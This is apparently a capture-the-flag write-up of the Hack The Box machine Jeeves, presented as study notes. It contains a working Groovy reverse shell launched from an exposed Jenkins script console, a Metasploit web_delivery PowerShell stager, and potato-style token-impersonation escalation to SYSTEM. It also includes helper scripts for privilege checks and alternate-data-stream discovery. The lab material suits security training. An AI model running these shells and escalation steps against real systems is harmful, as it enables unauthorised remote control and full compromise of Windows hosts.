
Potato Attacks

Rotten Potato: Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM (foxglovesecurity.com)

Juicy Potato:

ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. (github.com)

SeImpersonatePrivilege is usually held by service accounts (IIS app pools, SQL Server, the account Jenkins runs under here), not by ordinary user accounts. Foreshadowing for the exam: to potato you need a foothold as a service account that holds this privilege; a plain user shell will not do.

Jeeves

  • Nothing useful on the web pages (port 80)
  • SMB doesn’t give anything
  • dirbuster (directory brute force) on the HTTP services

We get

10.10.10.63:50000/askjeeves

This is a Jenkins instance. Its script console (Manage Jenkins > Script Console, /askjeeves/script) runs arbitrary Groovy as the Jenkins service account, so it is an immediate code-execution primitive.

groovy reverse shell Pure Groovy/Java Reverse Shell (github.com):

String host = "10.10.14.4";   // Kali IP, where the netcat listener runs
int port = 8044;              // must match the listener port
String cmd = "cmd.exe";       // shell to spawn on the target
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    // pump the process's stdout/stderr to the socket, and socket input to the process's stdin
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    // exitValue() throws while the process is still running; once it returns, the shell is gone
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

*host is the Kali IP; port must match the netcat listener started next

netcat listener:

nc -nvlp 8044

check user:

whoami

***HOW TO FIND POTATO ATTACK***

check priv:

whoami /priv

SeImpersonatePrivilege shows as Enabled*** (this is the precondition for a potato attack)
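The check above is what decides whether a potato attack is even on the table. As an added example (not from the original notes or from any of the potato tools), here is a small parser for whoami /priv output that flags the two privileges that matter, SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege. The sample output is constructed, not captured from the box. Note that a privilege listed as Disabled is still held by the token (the process can enable it itself), so only its absence rules the attack out.

```python
import re

# Constructed sample of `whoami /priv` output from a service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that make token-impersonation ("potato") attacks possible.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# A privilege row: name, free-text description, then the State column.
_PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _PRIV_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def potato_candidates(privs):
    """Return the held potato-relevant privileges with their state.

    A privilege shown as Disabled is still held by the token; the process can
    enable it with AdjustTokenPrivileges, so absence is the only blocker.
    """
    return {name: state for name, state in privs.items() if name in POTATO_PRIVS}


def can_potato(privs):
    """True if the token holds any privilege usable by a potato attack."""
    return bool(potato_candidates(privs))


if __name__ == "__main__":
    held = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    print("potato possible:", can_potato(held), potato_candidates(held))
```

Paste the real whoami /priv output into SAMPLE_WHOAMI_PRIV (or read it from the file you saved) and the script tells you whether to bother with the potato modules at all.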

System info:

systeminfo

save the full output to a file on Kali for Windows Exploit Suggester NG (wes.py) later

use wes.py (Windows Exploit Suggester NG; run ./wes.py --update first if the definitions database is missing or stale)

cd /home/kali/wesng/
./wes.py /home/kali/Desktop/HackTheBox/Jeeves/systeminfo.txt
#history | grep wes.py

***HOW TO RUN POTATO ATTACK***

metasploit:

msfconsole
search web_delivery
use 1
OR
use exploit/multi/script/web_delivery

(the number depends on the order of the search results, so the full module path is the safer choice)

options

The default target is Python, which is no use unless the target machine has a Python interpreter. On Windows, use the PowerShell target instead:

show targets
set target 2
OR
set target PSH

Target 2 is PSH, i.e. PowerShell.

set payload to:

set payload windows/meterpreter/reverse_tcp

**The x64 meterpreter payload never connected back, so we fell back to the 32-bit windows/meterpreter/reverse_tcp; this is why the session is x86 later on.

set other options:

set lhost 10.10.14.4
set srvhost 10.10.14.4

*both are the Kali IP (LHOST is where the payload connects back, SRVHOST is where the stager is served from)

run

copy powershell command it gave you:

powershell.exe -nop -w hidden -e <base64 stager printed by msfconsole>

paste it into the shell on the target (the netcat shell from the Groovy reverse shell) and hit enter

Go back to metasploit

sessions 1

meterpreter commands:

getuid
sysinfo
getprivs

getuid shows which user the session runs as

sysinfo showed an x64 OS but an x86 meterpreter (the 32-bit stager was the one that worked). Local exploit modules generally want a session whose architecture matches the target, so we either migrate into a 64-bit process or use a module that copes with the mismatch.

getprivs shows whether SeImpersonatePrivilege is available (we checked earlier with whoami /priv and it was)

***HOW TO USE METERPRETER WES/WINDOWS-EXPLOIT-SUGGESTER/SUGGESTER***

run post/multi/recon/local_exploit_suggester

put this in the background:

background

and use the juicy variant of the reflection (potato) module. The plain ms16_075_reflection module is sensitive to the x86-session-on-x64-OS mismatch we have here; the juicy variant handles it:

use exploit/windows/local/ms16_075_reflection_juicy

check and change settings:

options
set lhost 10.10.14.4
set session 1
set lport 5555

LPORT must differ from the port session 1 already uses (4444, the default), otherwise the new handler cannot bind; 5555 is just the next convenient choice

set the payload to x64 (if using plain reflection without juicy, you would instead have to migrate into an x64 process first):

set payload windows/x64/meterpreter/reverse_tcp
run

meterpreter:

getuid
shell

IF IT DOESN’T SAY SYSTEM: the exploit may have obtained a SYSTEM token without switching to it, so impersonate it with incognito:

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell

(if the console swallows the single backslash, write the token as "NT AUTHORITY\\SYSTEM")

in shell:

cd c:\users\administrator\desktop
type hm.txt

hm.txt only says to look deeper, so the flag is hidden somewhere else on the file. Check for alternate data streams:

dir /R

dir /R lists a second stream, hm.txt:root.txt:$DATA. type cannot open a stream path, but input redirection can:

more < hm.txt:root.txt:$DATA

We got flag!
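dir /R prints stream entries on their own indented line (no date, just a size and name:stream:$DATA), which is easy to miss in a long listing. As an added example (not from the original notes), here is a parser for that format that pulls out every alternate data stream, drops the Zone.Identifier noise that every downloaded file carries, and builds the more < command to dump the rest. The listing is constructed to resemble the Administrator desktop from these notes; the sizes and timestamps are made up.

```python
import re

# Constructed `dir /R` listing; sizes, dates and the volume line are made up.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is XXXX-XXXX

 Directory of C:\\Users\\Administrator\\Desktop

11/03/2017  10:03 PM    <DIR>          .
11/03/2017  10:03 PM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
                                    26 Windows 10 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)   2,611,462,144 bytes free
"""

# Streams that are normal noise rather than hidden content.
NOISE_STREAMS = {"Zone.Identifier"}   # mark-of-the-web on downloaded files

# A stream row: size, then file:stream:$DATA (no date columns).
_ADS_RE = re.compile(r"^\s*(\d[\d,]*)\s+(.+?):([^:]+):\$DATA\s*$")


def parse_ads(text):
    """Return [(file, stream, size_bytes)] for every ADS in `dir /R` output."""
    streams = []
    for line in text.splitlines():
        m = _ADS_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            streams.append((m.group(2), m.group(3), size))
    return streams


def interesting_ads(streams):
    """Drop well-known benign streams so only hidden data is left."""
    return [s for s in streams if s[1] not in NOISE_STREAMS]


def read_commands(streams):
    """cmd.exe commands to dump each stream; `more <` accepts a stream path where `type` does not."""
    return ['more < "%s:%s:$DATA"' % (f, s) for f, s, _ in streams]


if __name__ == "__main__":
    found = interesting_ads(parse_ads(SAMPLE_DIR_R))
    for cmd in read_commands(found):
        print(cmd)
```

Feed it the real dir /R output (run it against each directory of interest, since dir /R only shows streams for the files it lists) and it hands back the exact commands to run in the shell.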

Alternate Data Streams